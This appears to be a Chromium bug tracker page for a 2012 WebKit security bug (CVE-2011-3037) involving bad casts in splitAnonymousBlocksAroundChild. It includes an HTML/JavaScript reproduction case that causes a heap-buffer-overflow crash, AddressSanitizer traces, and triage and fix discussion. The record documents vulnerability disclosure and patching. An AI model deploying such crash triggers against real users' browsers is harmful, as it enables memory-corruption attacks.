New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Feb 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment

Bad casts due to issues in splitAnonymousBlocksAroundChild

Reported by miau...@gmail.com, Feb 9 2012

Issue description



VULNERABILITY DETAILS

READ of size 1 at 0x7fffece4b5c0 thread T0
    #0 0x55555aa7faf8 in WebCore::RenderTableSection::setNeedsCellRecalc() ???:0

I think I have 4 or 5 of these stacks. maybe they are all the same bug.


VERSION
Chrome Version: stable, beta, dev

Chromium	19.0.1036.0 (Developer Build 121128)
OS	Linux
WebKit	535.20 (@107140)
JavaScript	V8 3.9.4

Operating System: 64bit linux
REPRODUCTION CASE
<html>
  <head>
    <style>
      #el1 {
        -webkit-column-count: 2;
        content: counter(c);
      }
      #el1::after {
        display: table-row;
        content: '';
      }
      #el3 {
        -webkit-column-span: all;
      }
    </style>
    <script>
      function crash(){
        el0 = document.createElement('div')
        document.body.appendChild(el0)
        el1 = document.createElement('div')
        el1.setAttribute('id', 'el1')
        el0.appendChild(el1)
        el1.appendChild(document.createElement('thead'))
        el3 = document.createElement('div')
        el3.setAttribute('id', 'el3')
        el1.appendChild(el3)
        el4 = document.createElement('q')
        el1.appendChild(el4)
        el4.style.display='table-row'
        setTimeout(function() {
          el3.style.display='table'
          document.body.focus()
          document.body.style.zoom=2
        }, 0)
      } 
      window.onload=crash
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer+asan
Crash State: 

READ of size 1 at 0x7fffecc2dfc0 thread T0
    #0 0x55555ae0fa42 in WebCore::RenderTableSection::setNeedsCellRecalc() ???:0
    #1 0x55555adf533a in WebCore::RenderTableCell::willBeDestroyed() ???:0
    #2 0x55555adba252 in WebCore::RenderObject::destroy() ???:0

0x7fffecc2dfc0 is located 136 bytes to the right of 184-byte region [0x7fffecc2de80,0x7fffecc2df38)
allocated by thread T0 here:
    #0 0x55555da19582 in malloc ??:0
    #1 0x55555abad9c6 in WebCore::RenderBlock::createAnonymousBlock(bool) const ???:0

 
asan-renderTable136184.txt
6.3 KB View Download
beta-asan-renderTable136184.txt
5.9 KB View Download
renderTable136184.html
1001 bytes View Download
stable-asan-renderTable136184.txt
5.9 KB View Download

Comment 1 by miau...@gmail.com, Feb 9 2012

here's a different stack

==27297== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fffecc2ddc0 at pc 0x55555ae10066 bp 0x7fffffff4130 sp 0x7fffffff4128
READ of size 1 at 0x7fffecc2ddc0 thread T0
    #0 0x55555ae10066 in WebCore::RenderTableSection::removeChild(WebCore::RenderObject*) ???:0
    #1 0x55555adba0bd in WebCore::RenderObject::willBeDestroyed() ???:0

0x7fffecc2ddc0 is located 136 bytes to the right of 184-byte region [0x7fffecc2dc80,0x7fffecc2dd38)
allocated by thread T0 here:
    #0 0x55555da19582 in malloc ??:0
    #1 0x55555abad9c6 in WebCore::RenderBlock::createAnonymousBlock(bool) const ???:0
    #2 0x55555abac947 in WebCore::RenderBlock::splitAnonymousBlocksAroundChild(WebCore::RenderObject*) ???:0



136184-three.html
873 bytes View Download
136184-three.txt
5.9 KB View Download

Comment 2 by miau...@gmail.com, Feb 9 2012

and this...

READ of size 1 at 0x7fffecc9e3c0 thread T0
    #0 0x55555ae0e804 in WebCore::RenderTableSection::willBeDestroyed() ???:0
    #1 0x55555adba252 in WebCore::RenderObject::destroy() ???:0

0x7fffecc9e3c0 is located 136 bytes to the right of 184-byte region [0x7fffecc9e280,0x7fffecc9e338)
allocated by thread T0 here:
    #0 0x55555da19582 in malloc ??:0
    #1 0x55555abad9c6 in WebCore::RenderBlock::createAnonymousBlock(bool) const ???:0
    #2 0x55555abac947 in WebCore::RenderBlock::splitAnonymousBlocksAroundChild(WebCore::RenderObject*) ???:0



136184four.txt
5.2 KB View Download
136184four.html
847 bytes View Download

Comment 3 by miau...@gmail.com, Feb 9 2012

this is the last one:

==4573== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fffecc9dbc0 at pc 0x55555adf72ff bp 0x7fffffff9630 sp 0x7fffffff9628
READ of size 1 at 0x7fffecc9dbc0 thread T0
    #0 0x55555adf72ff in WebCore::RenderTableCell::clippedOverflowRectForRepaint(WebCore::RenderBoxModelObject*) const ???:0
    #1 0x55555adaf90b in WebCore::RenderObject::repaint(bool) ???:0


0x7fffecc9dbc0 is located 136 bytes to the right of 184-byte region [0x7fffecc9da80,0x7fffecc9db38)
allocated by thread T0 here:
    #0 0x55555da19582 in malloc ??:0
    #1 0x55555abac553 in WebCore::RenderBlock::createAnonymousColumnsBlock() const ???:0
    #2 0x55555abaea68 in WebCore::RenderBlock::splitFlow(WebCore::RenderObject*, WebCore::RenderBlock*, WebCore::RenderObject*, 


136184five.txt
7.1 KB View Download
136184five.html
923 bytes View Download
Labels: Mstone-18 SecSeverity-High SecImpacts-Stable SecImpacts-Beta
18.0.1025.7/linux/debug, 17.0.963.51/linux/debug hit this assert:

ASSERTION FAILED: !object || object->isRenderBlock()
third_party/WebKit/Source/WebCore/rendering/RenderBlock.h(1087) : WebCore::RenderBlock* WebCore::toRenderBlock(WebCore::RenderObject*)
 Issue 113431  has been merged into this issue.
Labels: -Area-Undefined Area-WebKit
Status: Available
Upstreamed as https://bugs.webkit.org/show_bug.cgi?id=78269
just afyi, c#3 test case is different from rest and dup 113431. it is being fixed by  bug 113258 
 Issue 113908  has been merged into this issue.
Summary: Bad casts due to issues in splitAnonymousBlocksAroundChild
Labels: -Pri-0 -Mstone-18 Pri-1 Mstone-17 Stability-AddressSanitizer OS-All
SecImpacts Stable is m17
Cc: adamk@chromium.org
Cc: jchaffraix@chromium.org
Owner: infe...@chromium.org
Status: Started
looking.

Comment 13 by kenrb@chromium.org, Feb 17 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/108127
DONT merge this until http://code.google.com/p/chromium/issues/detail?id=115003 is fixed. Check out c#18 and c#19 in https://bugs.webkit.org/show_bug.cgi?id=79043.

Comment 15 by kenrb@chromium.org, Feb 22 2012

Labels: -Merge-Approved
Status: Assigned
Labels: Merge-Approved
Status: FixUnreleased
make sure to merge this http://trac.webkit.org/changeset/108606 alongwith http://trac.webkit.org/changeset/108127. It prevents regressions in run-in crashes in 115003 and fixes their renderings which is more important to prevent future bugs. Traditionally run-ins and list-items have been pretty naughty to cause security problems.
confirming that r108606 fixes the run-in issues and all crashes - https://cluster-fuzz.appspot.com/?search=122724:122726#testcases
Labels: -reward-topanel reward-1000 reward-unpaid
$1000 per bad cast issue -- we decided these do indeed constitute multiple issues so brace for more rewards :D

$1000

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Labels: CVE-2011-3037
Labels: -reward-unpaid

Comment 23 by cdn@chromium.org, May 15 2012

Status: Fixed
Marking old security bugs Fixed..
Project Member

Comment 24 by bugdroid1@chromium.org, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member

Comment 25 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -Mstone-17 -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer Cr-Content Security-Impact-Stable Security-Severity-High Security-Impact-Beta Type-Bug-Security M-17 Performance-Memory-AddressSanitizer
Project Member

Comment 26 by bugdroid1@chromium.org, Mar 13 2013

Labels: Restrict-View-EditIssue
Project Member

Comment 27 by bugdroid1@chromium.org, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member

Comment 29 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 30 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 31 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 32 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 33 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 34 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 35 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 36 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment